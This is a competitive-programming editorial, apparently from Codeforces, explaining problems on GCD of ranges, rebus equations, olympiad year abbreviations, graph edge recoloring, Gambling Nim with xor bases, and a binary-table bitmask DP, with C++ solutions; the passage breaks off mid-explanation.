Line 32 creates a structure, placing its address in the new pointer variable. The address is saved in the first structure in Line 38. That’s how the location of the second structure is retained.
Lines 40 through 43 fill information for the second pointer, assigning a NULL value to the next element at Line 43.
The linking takes place as the structures’ contents are displayed. Line 48 captures the first structure’s address. Then Line 54 captures the next structure’s address from within the first structure.
Exercise 1: Type the source code from A Primitive Linked-List Example into your editor. Even though it’s long, type it in because you’ll need to edit it again later (if you’re not used to that by now). Build and run.
Unlike arrays, structures in a linked list are not numbered. Instead, each structure is linked to the next structure in the list. As long as you know the address of the first structure, you can work through the list until the end, which is marked by a NULL.
A Primitive Linked-List Example shows some sloppy source code with lots of repeated code. When you see multiple statements like this in your code, you should immediately think “functions.”
A BETTER LINKED-LIST EXAMPLE
#include <stdio.h> #include <stdlib.h> #include <string.h> #define ITEMS 5 struct stock { char symbol[5]; int quantity; float price; struct stock *next; }; struct stock *first; struct stock *current; struct stock *new; struct stock *make_structure(void); void fill_structure(struct stock *a,int c); void show_structure(struct stock *a); int main() { int x; for(x=0;x<ITEMS;x++) { if(x==0) { first=make_structure(); current=first; } else { new=make_structure(); current->next=new; current=new; } fill_structure(current,x+1); } current->next=NULL; /* Display database */ puts("Investment Portfolio"); printf("SymboltSharestPricetValuen"); current = first; while(current) { show_structure(current); current=current->next; } return(0); } struct stock *make_structure(void) { struct stock *a; a=(struct stock *)malloc(sizeof(struct stock)); if(a==NULL) { puts("Some kind of malloc() error"); exit(1); } return(a); } void fill_structure(struct stock *a,int c) { printf("Item #%d/%d:n",c,ITEMS); printf("Stock Symbol: "); scanf("%s",a->symbol); printf("Number of shares: "); scanf("%d",&a->quantity); printf("Share price: "); scanf("%f",&a->price); } void show_structure(struct stock *a) { printf("%-6st%5dt%.2ft%.2fn", a->symbol, a->quantity, a->price, a->quantity*a->price); }
Most linked lists are created as shown in A Better Linked-List Example. The key is to use three structure variables, shown in Lines 13 through 15:
first always contains the address of the first structure in the list. Always.
current contains the address of the structure being worked on, filled with data, or displayed.
new is the address of a new structure created by using the malloc() function.
Line 7 declares the stock structure as global. That way, it can be accessed from the various functions.
The for loop between Lines 25 and 39 creates new structures, linking them together. The initial structure is special, so its address is saved in Line 30. Otherwise, a new structure is allocated, thanks to the make_structure() function.
In Line 35, the previous structure is updated; the value of current isn’t changed until Line 36. Before that happens, the pointer in the current structure is updated with the address of the next structure, new.
At Line 40, the end of the linked list is marked by resetting the new pointer in the last structure to a NULL.
The while loop at Line 46 displays all structures in the linked list. The loop’s condition is the value of the current pointer. When the NULL is encountered, the loop stops.
The rest of the code shown in A Better Linked-List Example consists of functions that are pretty self-explanatory.
Exercise 2: Copy the code from A Better Linked-List Example into the editor. Build and run.
Take note of the scanf() statements in the fill_structure() function. Remember that the -> is the “peeker” notation for a pointer. To get the address, you must prefix the variable with an & in the scanf() function. | https://www.dummies.com/programming/c/how-to-create-a-linked-list-in-c-programming/ | CC-MAIN-2019-22 | refinedweb | 1,118 | 63.8 |
I'm a practical programmer. I don't like to over-optimize my code, and I want to make it very readable for the next person who needs to work with something that I wrote. Consequently, I sometimes leave alternate interpretations and access patterns into my code that might not always work as expected. A great example of this is the ability to pass
null into C# methods and trigger a different behavior. This can lead to errors in future code where you are now accessing something that inadvertently is a
null object.
In C# 8, the langauge designers introduced a feature called Nullable Reference Types that allows you to define which variables could be null and which variables should NEVER be null.
In this article, and as an effort to help make myself a better programmer, we're going to review the nullable Reference Types feature of C# and discuss why it is an important feature that we should start using by default in our applications.
Why null?
As an object oriented language, C# has always had the concept of
null in code. null is the absence of an object, its synonymous with "nothing" and is an easy concept for folks to understand when you declare a variable. However, this can (and most likely WILL) lead to the dreaded
NullReferenceException, an error that indicates a
null object was acted on unexpectedly.
PRO TIP: Sometimes, you'll hear C# programming folks refer to a
NullReferenceException as an NRE.
Logger myConsoleLogger = default(ILogger); myConsoleLogger.LogInformation("Processed the data");
In the sample above, the
myConsoleLogger object is declared and assigned its default value (which is null). This would trigger a
NullReferenceException because
myConsoleLogger was never assigned an instance of an object. This is a simple mistake, but it would be really nice if the compiler caught this before we even tried to run the code. Consider a scenario like this array:
string[] values = new string[3]; string firstValue = values[0]; Console.WriteLine(firstValue.ToLower());
This is going to throw a
NullReferenceException also, because the
values array is declared but never assigned values. The
firstValue variable is initialized with a
null value on line 2 and the
ToLower() method is then attempting to operate on a
null object. Once again, a simple error because the
values array is never assigned values.
Nullable Contexts and Compiler Warnings to the Rescue!
Some folks fear the compiler. There's a feeling that the compiler throwing errors or emitting warnings is an intimidating practice. I see it the other way: The compiler is my friend telling me when I made a mistake before I attempt to run my application. In this case, I want the compiler to tell me when I might work with a
null object because the variables weren't initialized properly. Let's get some help to ensure that our objects in our code are being used correctly.
By default in C#, any reference type can be assigned the
null value. With C# 8 and .NET Core 3.0 and later, we can define contexts in and around our projects where the compiler will perform nullability checks and raise warnings if we are potentially going to throw a
NullReferenceException.
We can enable nullable checking on a segment of code by wrapping it with a compiler pre-processor
#nullable with a setting the indicates how it should behave. Let's add nullability checking to the
Hat class I introduced in the previous post in this series:
#nullable enable public class Hat { public string Name { get; set; } public int AcquiredYear { get; set; } public string Theme { get; set; } } #nullable restore
There are two pre-processor commands present in this code:
#nullable enable and
#nullable restore. The
enable command tells the compiler to check for variables that could be inadvertently assigned null and raise a compiler warning if there are any. Sure enough, in the
Hat class, the string properties
Name and
Theme need to be initialized according to these compiler warnings:
warning CS8618: Non-nullable property 'Name' must contain a non-null value when exiting constructor. Consider declaring the property as nullable. warning CS8618: Non-nullable property 'Theme' must contain a non-null value when exiting constructor. Consider declaring the property as nullable.
This are easy fixes as I can default the values for these two properties to
string.Empty:
#nullable enable public class Hat { public string Name { get; set; } = string.Empty; public int AcquiredYear { get; set; } public string Theme { get; set; } = string.Empty; } #nullable restore
The compiler warnings go away, and I am a happy developer. If I try to define a
Hat and assign
null to these fields, will the compiler catch it?
var newHat = new Hat { Name="Phillies 80's Maroon", AcquiredYear=1985, Theme=null };
This code DOES compile with no warnings. Why? The
#nullable compiler directive is set on the
Hat class, not the construction of the
newHat variable. In order to protect more of our code, we need to expand the nullable check's scope to include more of our code.
#nullable enable var newHat = new Hat { Name="Phillies 80's Maroon", AcquiredYear=1985, Theme=null }; #nullable restore
This raises the appropriate compiler warning:
warning CS8625: Cannot convert null literal to non-nullable reference type.
Let's review quickly: these are ONLY compiler warnings. In fact, this code will run and not produce any errors.
Declaring a Reference Type as Nullable
I can also tell the compiler that it's ok if one of these reference values is assigned null by attaching a
? to the end of it's variable declaration:
public class Hat { public string? Name { get; set; } public int AcquiredYear { get; set; } public string Theme { get; set; } = string.Empty; }
With this change, the
Name of the hat is allowed to be assigned
null regardless of the Nullable context around the class.
Project-wide Nullable Checking
What if I want to roll-out this compiler interaction across my ENTIRE project. You can add an entry to your project file that indicates nullable checking should be enabled with the
Nullable element:
<Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <OutputType>Exe</OutputType> <TargetFramework>net5.0</TargetFramework> <Nullable>enable</Nullable> </PropertyGroup> </Project>
We can now remove the
#nullable directives from the
Hat class and I'll receive the same compiler warnings without writing more code.
Disable Nullable Checking
What if I have an application that is configured with the
Nullable entry in the project file, and I want to relax the checking on various sections of my application?
Similar to before, we can add a processor directive to our code that disables null checking:
#nullable disable var newHat = new Hat { Name="Phillies 80's Maroon", AcquiredYear=1985, Theme=null }; #nullable restore
Now we're talking... I can enforce the better developer behavior by adding the Nullable check to my project file, and those developers that want to take the risk of assigning and working with
null can wrap their code with the processor to remove the warnings.
The Final Step
Warnings are just silly yellow text the compiler emits that tells us we MIGHT have a concern in our project. Did you know that you can turn up the importance of this warnings, converting them to errors the compiler emits and ensuring that you write better code? Add the
TreatWarningsAsErrors element to your project file and those pesky warnings become a real problem that blocks your project from compiling properly:
<Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <OutputType>Exe</OutputType> <TargetFramework>net5.0</TargetFramework> <Nullable>enable</Nullable> <TreatWarningsAsErrors>true</TreatWarningsAsErrors> </PropertyGroup> </Project>
Now our project team will be forced to treat
null values with more respect.
Summary
The ability to assign and work with the
null value is valuable in C#, but can be misused and lead to errors in our running applications. Let's get some help from the compiler to make handling of
null values easier and clearer when we're building our projects.
Did you know, I host a weekly live stream on the Visual Studio Twitch channel teaching the basics of C#? Tune in on Mondays at 9a ET / 1300 UTC for two hours of learning in a beginner-friendly Q+A format with demos and sample code you can download.
Looking to get started learning C#? Checkout our free on-demand courses on Microsoft Learn!
Discussion (0) | https://dev.to/dotnet/my-favorite-c-features-part-3-nullability-2mcg | CC-MAIN-2021-21 | refinedweb | 1,386 | 52.19 |
Programming
If you don't know what this is, you don't need it
A package that depends/installs all the hotfixes and updates in Extras that have not (yet) been made part of a firmware update, currently containing . * QtQuick compat - alllow import QtQuick 1.0 * Bearer hotfix - fix loading of resources over network
Votes: 0
Integrated Developer Environment for .NET
MonoDevelop is a IDE primarily designed for C# and other CLI (.NET) languages..
=== Use Fn-Tap for right clicks ===
Votes: 2
Makes 'QtQuick 1.0' QML namespace available in Qt 4.7.0
Version 4.7.1 of Qt / the QtDeclarative module introduces a new default namspace for its basic types: 'QtQuick 1.0'. The originaly namespace 'Qt 4.7' still works, but is deprecated. This package installs a 'compatibility' plugin to Qt 4.7.0 that re-registers all 'Qt 4.7' types in the new namespace. Note that this isn't officially endorsed: You should rather fix your imports if you target 4.7.0. Anyhow, this plugin can be handy to quickly try out e.g. newer Qt examples & demos on the device. | http://maemo.org/downloads/Maemo5/development/?org_openpsa_qbpager_org_openpsa_products_product_dba_page=2 | CC-MAIN-2013-20 | refinedweb | 187 | 69.38 |
Agenda
See also: IRC log
<trackbot> Date: 13 June 2012
<scribe> scribe: John_Boyer
Steven: CMS company, very
enthusiastic about XForms
... They have an XForms implementation with some very nice features
... a whole workplace, an xform rendition, validation area, etc.
... They have a design tool. They can also can convert an HTML form to XForms with copy-paste ease
... They want to be a member of the working group
... working on OK from their management
... They also want to do a workshop on XForms business and/or government
John: Thanks Steven, that is a great and motivating report, Thanks for visiting them
<Steven>
Steven: can we resolve this namepace change?
RESOLUTION: Functions go into XForms (2003) namespace
<Steven>
<nvdbleek>
<Steven> Nick: Is it allowed on insert as well?
<Steven> ... you did it for header, var and bind?
<Steven> John: Yes
<Steven> Nick: Why not on actions?
<Steven> John: We're trying to ensure data doesn't travel between models
<Steven> ... a var makes the variable available in the model, but if a var can point to other vars, it can bring values from other models
<Steven> ... we should discuss this
<Steven> John: There's a non-normative note about actions
Nick: Why isn't model allowed on var?
<Steven> Erik: What about dispatch?
<Steven> Nick: dispatch could mix models
<Steven> John: But there's no cross-model data-dependency
John_Boyer: var would then consume data from one model and pull it into another model
<Steven> ... didn't we already have that problem?
John_Boyer: in the past we've had this rule of thumb to avoid creating cross-model data dependencies
<nvdbleek>
John_Boyer: When model is used on an insert, delete or setvalue, it resets the context of the whole action
<Steven> John_Boyer: We may need to create more restrictions to handle those
John_Boyer: It sounds pretty safe that children of dispatch could bind to different models because the result is an event
Nick: Not sure why there is a limitation on switching models with var
John_Boyer: I could see removing the restriction on both var and header; the real issue was crossing models on the bind element due to cross-model dependencies
Erik: Would actions within the model have any restrictions? I think they don't
RESOLUTION: Remove restriction on model from header and var, leave restriction to current model on bind element
<scribe> ACTION: Nick to Remove restriction on model from header and var, leave restriction to current model on bind element [recorded in]
<trackbot> Created ACTION-1906 - Remove restriction on model from header and var, leave restriction to current model on bind element [on Nick Van Den Bleeken - due 2012-06-20].
John_Boyer: Erik I agree no
restrictions on model attributes of actions in a model, neither
before nor now
... Only other thing I did was change description of rebuild, recalculate, revalidate, refresh and reset, which used to have model as special attributes
<Steven>
Steven: This is now done
Nick: yes I think we agreed to that, but there is a lot of work in the spec to do that
Erik: My concern is that I don't yet know what to implement, and all that needs to be specified
John_Boyer: Do we need Alain to give us a description of what got implemented for load/@show=embed?
Nick: input from community group?
Alain: Yes we implemented, and the implementation is compatible with betterForm. BetterForm has some extension functions that XSLTForms doesn't implement, but the baseline is there.
Erik: It would help to have an email with a few bullet points to describe implementation issues like what to do with IDs, events, models, etc.
<scribe> ACTION: Alain to send email to working group with further implementation details for load/@show=embed that describes how the implementation works and how it handles issues like IDs, event propagation, embedded models, etc. [recorded in]
<trackbot> Created ACTION-1907 - Send email to working group with further implementation details for load/@show=embed that describes how the implementation works and how it handles issues like IDs, event propagation, embedded models, etc. [on Alain Couthures - due 2012-06-20].
Alain: it is very useful to have load/@show=embed for subforms
Steven: Any other spec review issues?
Nick: There was an override
issue, but it could be covered after FPWD
... I added an override feature for XPath functions, like what is in XSLT
Erik: You can implement a
function in XSLT to make sure an implementation is there, and
override lets you decide whether to let a native implementation
override or override the native implemenation with the one in
the XSLT
... Not sure the override feature is critical for XForms, but it is in XSLT
... Could ask Michael Kay what he thinks about the value of the override feature
... We have to weigh value versus implementation difficulty
John_Boyer: Is it a security
problem to let a document arriving and overriding functions in
the native implementation?
... I mean, when the XForm is running in the browser.
Nick: XSLT has the same
problem
... When running in a browser
<nvdbleek> Nick: An implementation may have a custom function that isn't behaving as the form expects, in those cases it is desirable to override the function
Erik: an implementation won't let you crush a native implementation. It's a local change
John_Boyer: I don't understand; does the override feature specify that it only makes a local change?
<nvdbleek> Nick: Another use case is that you specify the function in both script and native xforms and don't wan't to override the script version if the processor supports the script language
Erik: No, an overriding function in an xform could override a function provided by the xforms processor
<nvdbleek> but only extension functions, not functions in the XForms namespace nor in the xpath function namespace
John_Boyer: It seems off that an xforms processor defined function could be overridden
Erik: We could say that override only applies to extension functions, not those in xforms
Steven: Does it make sense to ask Michael Kay?
John_Boyer: Yes, although he
probably doesn't do much with digitally signing XSLT.
... makes sense to ask Michael about the value to XSLT of the override
Steven: need a resolution about FPWD. Any objections?
All: no
RESOLUTION: Publish FPWD of XForms 2.0 and XPath Expression module
hmm, what's taking zakim so long?
This is scribe.perl Revision: 1.136 of Date: 2011/05/12 12:01:43 Check for newer version at Guessing input format: RRSAgent_Text_Format (score 1.00) Succeeded: s/* Topic/Topic/ Succeeded: s/teh/the/ Succeeded: s/TH/Th/ Succeeded: s/made/may/ Succeeded: s/Topic: Spec review// Succeeded: s/down/done/ Found Scribe: John_Boyer Inferring ScribeNick: John_Boyer Default Present: +44.782.483.aaaa, +1.323.425.aabb, nvdbleek, +1.650.919.aacc, ebruchez, Steven, Philip, alain Present: +44.782.483.aaaa +1.323.425.aabb nvdbleek +1.650.919.aacc ebruchez Steven Philip alain John_Boyer Regrets: Kurt Agenda: Found Date: 13 Jun 2012 Guessing minutes URL: People with action items: alain nick WARNING: Input appears to use implicit continuation lines. You may need the "-implicitContinuations" option.[End of scribe.perl diagnostic output] | http://www.w3.org/2012/06/13-forms-minutes.html | CC-MAIN-2015-06 | refinedweb | 1,194 | 58.92 |
Investors considering a purchase of VEREIT Inc (Symbol: VER) shares, but tentative about paying the going market price of $7.17/share, might benefit from considering selling puts among the alternative strategies at their disposal. One interesting put contract in particular, is the January 2018 put at the $5 strike, which has a bid at the time of this writing of 65 cents. Collecting that bid as the premium represents a 13% return against the $5 commitment, or a 6.7% annualized rate of return (at Stock Options Channel we call this the YieldBoost ).
Selling a put does not give an investor access to VER VEREIT Inc sees its shares fall 30.2% and the contract is exercised (resulting in a cost basis of $4.35 per share before broker commissions, subtracting the 65 cents from $5), the only upside to the put seller is from collecting that premium for the 6.7% annualized rate of return.
Below is a chart showing the trailing twelve month trading history for VEREIT Inc, and highlighting in green where the $5 strike is located relative to that history:
The chart above, and the stock's historical volatility, can be a helpful guide in combination with fundamental analysis to judge whether selling the January 2018 put at the $5 strike for the 6.7% annualized rate of return represents good reward for the risks. We calculate the trailing twelve month volatility for VEREIT Inc (considering the last 253 trading day closing values as well as today's price of $7.17) to be 25%. For other put options contract ideas at the various different available expirations, visit the VER Stock Options page of StockOptionsChannel.com.
In mid-afternoon trading on Thursday, the put volume among S&P 500 components was 1.18M contracts, with call volume at 1.19M, for a put:call ratio of 0.99. | https://www.nasdaq.com/articles/commit-purchase-vereit-5-earn-13-using-options-2016-02-11 | CC-MAIN-2021-25 | refinedweb | 313 | 62.27 |
This tutorial is a follow-up to Tutorial: How To Scrape Amazon Product Details and Pricing using Python, by extending the Amazon price data to also cover product reviews. The scope of this tutorial is limited to web scraping an Amazon product page to retrieve review summary and the first page of customer reviews for any product from Amazon.
Scraping Customer Reviews from Amazon can be useful for
- Getting complete review details that you can’t get with the Amazon Product Advertising API.
- Monitoring customer opinion on products that you sell or manufacture using Data Analysis
- Create Amazon Review Datasets for Educational Purposes and Research
Amazon used to provide access to product reviews through their Product Advertising API to developers and sellers, a few years back. They discontinued that on November 8, 2010, preventing customers from displaying Amazon reviews about their products, embedded in their websites. As of now, Amazon only returns a link to the review.
Take a look at the screenshot below, from a StackOverflow thread on the same topic.
We were able to find few tutorials on doing this using Perl ( ). Being the Python Enthusiasts, we are ( check out the other web scraping tutorials we have published before), we thought of making one using simple Python and the simple python library – LXML.
We’ll follow this post up with a tutorial on how to turn this code into a web API that you can use or integrate with your projects.
Requirements
For this web scraping tutorial using Python 3, we will need some packages for downloading and parsing the HTML. Below are the package requirements.
Install Python 3 and Pip
Here is a guide to install Python 3 in Linux –
Mac Users can follow this guide –
Windows Users go here –
Install Packages
- PIP to install the following packages in Python ()
- Python Requests, to make requests and download the HTML content of the pages ().
- Python LXML, for parsing the HTML Tree Structure using Xpaths (Learn how to install that here –)
- Python Dateutil, for parsing review dates ( )
Let us get our hands dirty now.
The Code
Here is the GIST link for the code above
If you would like the code in Python 2.7, you can check this link –.
Modify the code below. Add your own ASINs to the line.
AsinList = ['B01ETPUQ6E','B017HW9DEW'] If you are getting banned by Amazon, try increasing the delay from 5 seconds by editing the line
sleep(5)
. Increase to say 10 seconds.
sleep(10)
def ReadAsin(): #Add your own ASINs here AsinList = ['B01ETPUQ6E','B017HW9DEW'] extracted_data = [] for asin in AsinList: print "Downloading and processing page"+asin extracted_data.append(ParseReviews(asin)) sleep(5) f=open('data.json','w') json.dump(extracted_data,f,indent=4)
Once you are done modifying the script, run this script using Python 3 in a Terminal or Command Prompt. We named our file `amazon_review_scraper.py`.
python amazon_review_scraper.py
Once the script completes running, you can see a file called data.json, with the reviews data in a JSON format.
Below is the formatted output we received for the ASINs we supplied
Here is the full output attached in a GIST.
This code should work for a relatively small number of ASINs for your personal projects, but if you want to scrape websites for thousands of pages, learn about the challenges here Scalable do-it-yourself scraping – How to build and run scrapers on a large scale.
Thanks for reading and if you need help with your complex scraping projects let us know and we will be glad to help.
Do you need some professional help to scrape Amazon Data? Let us know
Turn the Internet into meaningful, structured and usable data
21 comments on “How to scrape Amazon Reviews using Python”
This script does not seem to work. The json written does not have any views in it.
Please copy the detailed error or how you ran this so we can check.
Thanks
how to increase the number of reviews obtained ??
Hi Arjun – that’s what’s called “an exercise left to the reader”. You will have to look at the pagination – click that and then get the next page and so on. Most likely you will get blocked pretty soon.
The ratings dictionary is very helpful for getting the percentage distributions of the reviews based on the number of stars, however is there an easy way to see the total number of reviews? For example, are those percentages based on 11 reviews or 3,000? Thanks!
I’m not very familiar with lxml so I think that’s where the I’m getting stuck
Hi,
I don’t think it’s working. Can you help me fix it? This is the output of the json file:
[
{
“error”: “failed to process the page”,
“asin”: “B01ETPUQ6E”
},
{
“error”: “failed to process the page”,
“asin”: “B017HW9DEW”
}
]
Thank you!
Could be an IP block?
Not showing all reviews. Any ideas ? My products have alot of reviews and the total result after i used the script isnt even close to that.
This script doesn’t get you all reviews. It was written specifically to demonstrate scraping reviews using Python, and was never intended as a fully functional scraper for thousands of pages.
I ran the code on Jupyter. The code ran without any error but I am not getting any output file.
When using in Jupyter Notebook, you should call the function
ParseReviewswith your ASIN.
For example,
ParseReviews(`B01ETPUQ6E`)would return a dict similar to
I am quite new to Python so apologies for any ignorance. I am getting a urllib3 InsecureRequestWarning, even after following the instructions here:
InsecureRequestWarning. Any thoughts as to why? I am using Jupyter, Python version 2.7.
Any idea why I would be getting this warning: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See:
InsecureRequestWarning) ? I followed the instructions on the urllib3 page but am still getting the same warning. I am in Jupyter (python 2). Thank you!
Love what you guys are doing, big fan of yours. I am currently collecting emails of Amazon reviewers and it’s a very time consuming process. If you could help me with a code for doing this it would be awesome and thank you for reading all of this.
Sorry we can’t write code on demand but you can hire someone on upwork to do all this.
I keep getting the error “unable to find reviews in page”, what could be the problem? [ I promise the product has reviews ]
The HTML parser seemed to have a depth limit. It wont traverse further to parse the text if the depth exceeds 254. We have updated our code to handle this.
We found Amazon sending null bytes along with the response in some cases which caused the Lxml parser failure. Our code base is now updated.
how would we get like 100 reviews off the site?
You would need to find the link to next page of reviews and parse it similarly as in this tutorial | https://www.scrapehero.com/how-to-scrape-amazon-product-reviews/ | CC-MAIN-2018-51 | refinedweb | 1,169 | 72.05 |
664A - Complicated GCD
Author of the idea — GlebsHP
We examine two cases:
- a = b — the segment consists of a single number, hence the answer is a.
- a < b — we have gcd(a, a + 1, a + 2, ..., b) = gcd(gcd(a, a + 1), a + 2, ..., b) = gcd(1, a + 2, ..., b) = 1.
#include <bits/stdc++.h> using namespace std; int main() { string a, b; cin >> a >> b; if (a == b) cout << a; else cout << 1; return 0; }
663A - Rebus
First we check whether any solution exists at all. For that purpose, we calculate the number of positive (the first one and any other with the + sign) and negative elements (with the - sign) in the sum. Let them be pos and neg, respectively. Then the minimum value of the sum that can be possibly obtained is equal to min = (1 · pos - n · neg), as each positive number can be 1, but all negative can be - n. Similarly, the maximum possible value is equal to max = (n · pos - 1 · neg). The solution therefore exists if and only if min ≤ n ≤ max.
Now suppose a solution exists. Let's insert the numbers into the sum one by one from left to right. Suppose that we have determined the numbers for some prefix of the expression with the sum of S. Let the sign of the current unknown be sgn ( + 1 or - 1) and there are some unknown numbers left to the right, excluding the examined unknown, among them pos_left positive and neg_left negative elements. Suppose that the current unknown number takes value x. How do we find out whether this leads to a solution? The answer is: in the same way we checked it in the beginning of the solution. Examine the smallest and the largest values of the total sum that we can get. These are equal to min_left = (S + sgn · x + pos_left - n · neg_left) and max_left = (S + sgn · x + n · pos_left - neg_left), respectively. Then we may set the current number to x, if min_left ≤ n ≤ max_left holds. To find the value of x, we can solve a system of inequalities, but it is easier simply to check all possible values from 1 to n.
BONUS Let k be the number of unknowns in the rebus. Prove that the complexity of the described solution (implementation shown below) is O(k2 + n), not O(k · n).
#include<bits/stdc++.h> using namespace std; char s[100]; int main() { int k = 0, n, pos = 1, neg = 0; while (true) { char c; scanf(" %c", &c); scanf(" %c", &c); if (c == '=') break; if (c == '+') pos++; if (c == '-') neg++; s[k++] = c; } scanf("%d", &n); if (pos - n * neg > n || n * pos - neg < n) { printf("Impossible\\n"); return 0; } printf("Possible\\n"); int S = 0; for (int i = 0; i < k; i++) { int sgn = 1; if (i > 0 && s[i - 1] == '-') sgn = -1; if (sgn == 1) pos--; if (sgn == -1) neg--; for (int x = 1; x <= n; x++) if (S + x * sgn + pos - n * neg <= n && S + x * sgn + n * pos - neg >= n) { printf("%d %c ", x, s[i]); S += x * sgn; break; } } printf("%d = %d\\n", abs(n - m), n); return 0; }
662D - International Olympiad
Author of the idea — Alex_2oo8
Consider the abbreviations that are given to the first Olympiads. The first 10 Olympiads (from year 1989 to year 1998) receive one-digit abbreviations (IAO'9, IAO'0, ..., IAO'8). The next 100 Olympiads (1999 - 2098) obtain two-digit abbreviations, because all one-digit abbreviations are already taken, but the last two digits of 100 consecutive integers are pairwise different. Similarly, the next 1000 Olympiads get three-digit abbreviations and so on.
Now examine the inversed problem (extract the year from an abbreviation). Let the abbreviation have k digits, then we know that all Olympiads with abbreviations of lengths (k - 1), (k - 2), ..., 1 have passed before this one. The number of such Olympiads is 10k - 1 + 10k - 2 + ... + 101 = F and the current Olympiad was one of the 10k of the following. Therefore this Olympiad was held in years between (1989 + F) and (1989 + F + 10k - 1). As this segment consists of exactly 10k consecutive natural numbers, it contains a single number with a k-digit suffix that matches the current abbreviation. It is also the corresponding year.
#include <bits/stdc++.h> using namespace std; char s[42]; int main() { int n; scanf("%d", &n); while (n--) { scanf(" %s", s); int k = strlen(s + 4), year = atoi(s + 4), F = 0, tenPow = 10; for (int i = 1; i < k; i++) { F += tenPow; tenPow *= 10; } while (year < 1989 + F) year += tenPow; printf("%d\\n", year); } return 0; }
662B - Graph Coloring
Author of the problem — gen
Examine the two choices for the final color separately, and pick the best option afterwards. Now suppose we want to color the edges red.
Each vertex should be recolored at most once, since choosing a vertex two times changes nothing (even if the moves are not consecutive). Thus we need to split the vertices into two sets S and T, the vertices that are recolored and the vertices that are not affected, respectively. Let u and v be two vertices connected by a red edge. Then for the color to remain red, both u and v should belong to the same set (either S or T). On the other hand, if u and v are connected by a blue edge, then exactly one of the vertices should be recolored. In that case u and v should belong to different sets (one to S and the other to T).
This problem reduces to 0-1 graph coloring, which can be solved by either DFS or BFS. As the graph may be disconnected, we need to process the components separately. If any component does not have a 0-1 coloring, there is no solution. Otherwise we need to add the smallest of the two partite sets of the 0-1 coloring of this component to S, as we require S to be of minimum size.
#include<bits/stdc++.h> using namespace std; const int MX = 100000; int n, vis[MX]; vector<pair<int, char>> G[MX]; vector<int> part[3]; bool dfs(int v, int p, char c) { if (vis[v] != 0) { return vis[v] == p; } vis[v] = p; part[p].push_back(v); for (auto x : G[v]) { if (dfs(x.first, x.second == c ? p : p ^ 3, c) == false) return false; } return true; } vector<int> solve(char c) { memset(vis, 0, sizeof vis); vector<int> ans; for (int i = 0; i < n; i++) if (vis[i] == 0) { part[1].clear(); part[2].clear(); if (dfs(i, 1, c) == false) { for (int j = 0; j < n + 1; j++) ans.push_back(-1); return ans; } int f = 1; if (part[2].size() < part[1].size()) f = 2; ans.insert(ans.end(), part[f].begin(), part[f].end()); } return ans; } int main() { int m; scanf("%d %d", &n, &m); for (int i = 0; i < m; i++) { int u, v; char c; scanf("%d %d %c", &u, &v, &c); u--; v--; G[u].emplace_back(v, c); G[v].emplace_back(u, c); } auto f = solve('R'); auto g = solve('B'); if (g.size() < f.size()) f = g; if (f.size() > n) { printf("-1\\n"); return 0; } printf("%d\\n", (int)f.size()); for (int x : f) printf("%d ", x + 1); printf("\\n"); return 0; }
662A - Gambling Nim
Author of the idea — GlebsHP
It is known that the first player loses if and only if the xor-sum of all numbers is 0. Therefore the problem essentially asks to calculate the number of ways to arrange the cards in such a fashion that the xor-sum of the numbers on the upper sides of the cards is equal to zero.
Let
and
. Suppose that the cards with indices j1, j2, ..., jk are faced with numbers of type b and all the others with numbers of type a. Then the xor-sum of this arrangement is equal to
, that is,
. Hence we want to find the number of subsets ci with xor-sum of S.
Note that we can replace c1 with
, as applying c1 is the same as applying
. Thus we can freely replace {c1, c2} with
and c2 with
. This means that we can apply the following procedure to simplify the set of ci:
- Pick cf with the most significant bit set to one
- Replace each ci with the bit in that position set to one to
- Remove cf from the set
- Repeat steps 1-5 with the remaining set
- Add cf back to the set
After this procedure we get a set that contains k zeros and n - k numbers with the property that the positions of the most significant bit set to one strictly decrease. How do we check now whether it is possible to obtain a subset with xor-sum S? As we have at most one number with a one in the most significant bit, then it tells us whether we should include that number in the subset or not. Similarly we apply the same argument for all other bits. If we don't obtain a subset with the xor-sum equal to S, then there is no such subset at all. If we do get a subset with xor-sum S, then the total number of such subsets is equal to 2k, as for each of the n - k non-zero numbers we already know whether it must be include in such a subset or not, but any subset of k zeros doesn't change the xor-sum. In this case the probability of the second player winning the game is equal to
, so the first player wins with probability
.
#include <bits/stdc++.h> using namespace std; const int size = 1000 * 1000 + 1; const int ssize = 100; int n; long long a[size], b[size]; long long ort[ssize]; long long p[ssize]; int main() { long long cur = 0ll; scanf("%d", &n); for (int i = 0; i < n; i++) { scanf("%lld%lld", &a[i], &b[i]); cur ^= a[i]; a[i] ^= b[i]; } a[n] = cur; int len = 0; for (int i = 0; i <= n; i++) { for (int j = 0; j < len; j++) { if (a[i] & p[j]) a[i] ^= ort[j]; } if (a[i]) { ort[len++] = a[i]; p[len - 1] = ((a[i] ^ (a[i] - 1)) + 1) >> 1; } } if (a[n]) { printf("1/1\\n"); } else { printf("%lld/%lld\\n", (1ll << len) - 1, (1ll << len)); } return 0; }
662C - Binary Table
Author of the idea — Alex_2oo8
First let's examine a slow solution that works in O(2n · m). Since each row can be either inverted or not, the set of options of how we can invert the rows may be encoded in a bitmask of length n, an integer from 0 to (2n - 1), where the i-th bit is equal to 1 if and only if we invert the i-th row. Each column also represents a bitmask of length n (the bits correspond to the values of that row in each of the n rows). Let the bitmask of the i-th column be coli, and the bitmask of the inverted rows be mask. After inverting the rows the i-th column will become
. Suppose that
contains
ones. Then we can obtain either k or (n - k) ones in this column, depending on whether we invert the i-th column itself. It follows that for a fixed bitmask mask the minimum possible number of ones that can be obtained is equal to
.
Now we want to calculate this sum faster than O(m). Note that we are not interested in the value of the mask
itself, but only in the number of ones it contains (from 0 to n). Therefore we may group the columns by the value of
. Let dp[k][mask] be the number of such i that
, then for a fixed bitmask mask we can calculate the sum in O(n) —
.
What remains is to calculate the value of dp[k][mask] in a quick way. As the name suggests, we can use dynamic programming for this purpose. The value of dp[0][mask] can be found in O(m) for all bitmasks mask: each column coli increases dp[0][coli] by 1. For k > 0, coli and mask differ in exactly k bits. Suppose mask and coli differ in position p. Then coli and
differ in exactly (k - 1) bits. The number of such columns is equal to
, except we counted in also the number of columns coli that differ with
in bit p (thus, mask and coli have the same value in bit p). Thus we need to subtract dp[k - 2][mask], but again, except the columns among these that differ with mask in bit p. Let
